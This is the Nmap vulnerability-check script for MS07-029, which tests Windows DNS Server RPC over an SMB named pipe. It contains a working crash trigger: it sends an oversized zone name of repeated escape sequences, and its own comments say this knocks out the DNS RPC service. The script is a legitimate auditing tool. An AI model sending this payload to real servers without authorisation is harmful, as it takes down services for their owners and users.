151 lines
5.3 KiB
Lua
151 lines
5.3 KiB
Lua
local msrpc = require "msrpc"
|
|
local smb = require "smb"
|
|
local stdnse = require "stdnse"
|
|
local string = require "string"
|
|
local vulns = require "vulns"
|
|
|
|
description = [[
|
|
Detects Microsoft Windows systems with Dns Server RPC vulnerable to MS07-029.
|
|
|
|
MS07-029 targets the <code>R_DnssrvQuery()</code> and <code>R_DnssrvQuery2()</code>
|
|
RPC method which isa part of DNS Server RPC interface that serves as a RPC service
|
|
for configuring and getting information from the DNS Server service.
|
|
DNS Server RPC service can be accessed using "\dnsserver" SMB named pipe.
|
|
The vulnerability is triggered when a long string is send as the "zone" parameter
|
|
which causes the buffer overflow which crashes the service.
|
|
|
|
This check was previously part of smb-check-vulns.
|
|
]]
|
|
---
|
|
--@usage
|
|
-- nmap --script smb-vuln-ms07-029.nse -p445 <host>
|
|
-- nmap -sU --script smb-vuln-ms07-029.nse -p U:137,T:139 <host>
|
|
--
|
|
--@output
|
|
--Host script results:
|
|
--| smb-vuln-ms07-029:
|
|
--| VULNERABLE:
|
|
--| Windows DNS RPC Interface Could Allow Remote Code Execution (MS07-029)
|
|
--| State: VULNERABLE
|
|
--| IDs: CVE:CVE-2007-1748
|
|
--| A stack-based buffer overflow in the RPC interface in the Domain Name System (DNS) Server Service in
|
|
--| Microsoft Windows 2000 Server SP 4, Server 2003 SP 1, and Server 2003 SP 2 allows remote attackers to
|
|
--| execute arbitrary code via a long zone name containing character constants represented by escape sequences.
|
|
--|
|
|
--| Disclosure date: 2007-06-06
|
|
--| References:
|
|
--| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1748
|
|
--|_ https://technet.microsoft.com/en-us/library/security/ms07-029.aspx
|
|
---
|
|
|
|
author = {"Ron Bowes", "Jiayi Ye", "Paulino Calderon <calderon()websec.mx>"}
|
|
copyright = "Ron Bowes"
|
|
license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
|
|
categories = {"intrusive","exploit","dos","vuln"}
|
|
-- run after all smb-* scripts (so if it DOES crash something, it doesn't kill
|
|
-- other scans have had a chance to run)
|
|
dependencies = {
|
|
"smb-brute", "smb-enum-sessions", "smb-security-mode",
|
|
"smb-enum-shares", "smb-server-stats",
|
|
"smb-enum-domains", "smb-enum-users", "smb-system-info",
|
|
"smb-enum-groups", "smb-os-discovery", "smb-enum-processes",
|
|
"smb-psexec",
|
|
};
|
|
|
|
|
|
hostrule = function(host)
|
|
return smb.get_port(host) ~= nil
|
|
end
|
|
|
|
local VULNERABLE = 1
|
|
local PATCHED = 2
|
|
local UNKNOWN = 3
|
|
local NOTUP = 8
|
|
|
|
---Check the existence of ms07_029 vulnerability in Microsoft Dns Server service.
|
|
--This check is not safe as it crashes the Dns Server RPC service its dependencies.
|
|
--@param host Host object.
|
|
--@return (status, result)
|
|
--* <code>status == false</code> -> <code>result == NOTUP</code> which designates
|
|
--that the targeted Dns Server RPC service is not active.
|
|
--* <code>status == true</code> ->
|
|
-- ** <code>result == VULNERABLE</code> for vulnerable.
|
|
-- ** <code>result == PATCHED</code> for not vulnerable.
|
|
|
|
function check_ms07_029(host)
|
|
--create the SMB session
|
|
local status, smbstate
|
|
status, smbstate = msrpc.start_smb(host, msrpc.DNSSERVER_PATH)
|
|
if(status == false) then
|
|
stdnse.debug1("check_ms07_029: Service is not active.")
|
|
return false, NOTUP --if not accessible across pipe then the service is inactive
|
|
end
|
|
--bind to DNSSERVER service
|
|
local bind_result
|
|
status, bind_result = msrpc.bind(smbstate, msrpc.DNSSERVER_UUID, msrpc.DNSSERVER_VERSION)
|
|
if(status == false) then
|
|
stdnse.debug1("check_ms07_029: false")
|
|
msrpc.stop_smb(smbstate)
|
|
return false, UNKNOWN --if bind operation results with a false status we can't conclude anything.
|
|
end
|
|
--call
|
|
local req_blob, q_result
|
|
status, q_result = msrpc.DNSSERVER_Query(
|
|
smbstate,
|
|
"VULNSRV",
|
|
string.rep("\\\13", 1000),
|
|
1)--any op num will do
|
|
--sanity check
|
|
msrpc.stop_smb(smbstate)
|
|
if(status == false) then
|
|
stdnse.debug1("check_ms07_029: DNSSERVER_Query failed")
|
|
if(q_result == "NT_STATUS_PIPE_BROKEN") then
|
|
return true, VULNERABLE
|
|
else
|
|
return true, PATCHED
|
|
end
|
|
else
|
|
return true, PATCHED
|
|
end
|
|
end
|
|
|
|
action = function(host)
|
|
local status, result, message
|
|
local response = {}
|
|
local vuln_report = vulns.Report:new(SCRIPT_NAME, host)
|
|
local vuln_table = {
|
|
title = 'Windows DNS RPC Interface Could Allow Remote Code Execution (MS07-029)',
|
|
state = vulns.STATE.NOT_VULN,
|
|
description = [[
|
|
A stack-based buffer overflow in the RPC interface in the Domain Name System (DNS) Server Service in
|
|
Microsoft Windows 2000 Server SP 4, Server 2003 SP 1, and Server 2003 SP 2 allows remote attackers to
|
|
execute arbitrary code via a long zone name containing character constants represented by escape sequences.
|
|
]],
|
|
IDS = {CVE = 'CVE-2007-1748'},
|
|
references = {
|
|
'https://technet.microsoft.com/en-us/library/security/ms07-029.aspx'
|
|
},
|
|
dates = {
|
|
disclosure = {year = '2007', month = '06', day = '06'},
|
|
}
|
|
}
|
|
|
|
-- Check for ms07-029
|
|
status, result = check_ms07_029(host)
|
|
if(status == false) then
|
|
if(result == NOTUP) then
|
|
vuln_table.extra_info = "Service is not active."
|
|
vuln_table.state = vulns.STATE.NOT_VULN
|
|
else
|
|
vuln_table.state = vulns.STATE.NOT_VULN
|
|
end
|
|
else
|
|
if(result == VULNERABLE) then
|
|
vuln_table.state = vulns.STATE.VULN
|
|
else
|
|
vuln_table.state = vulns.STATE.NOT_VULN
|
|
end
|
|
end
|
|
return vuln_report:make_output(vuln_table)
|
|
end
|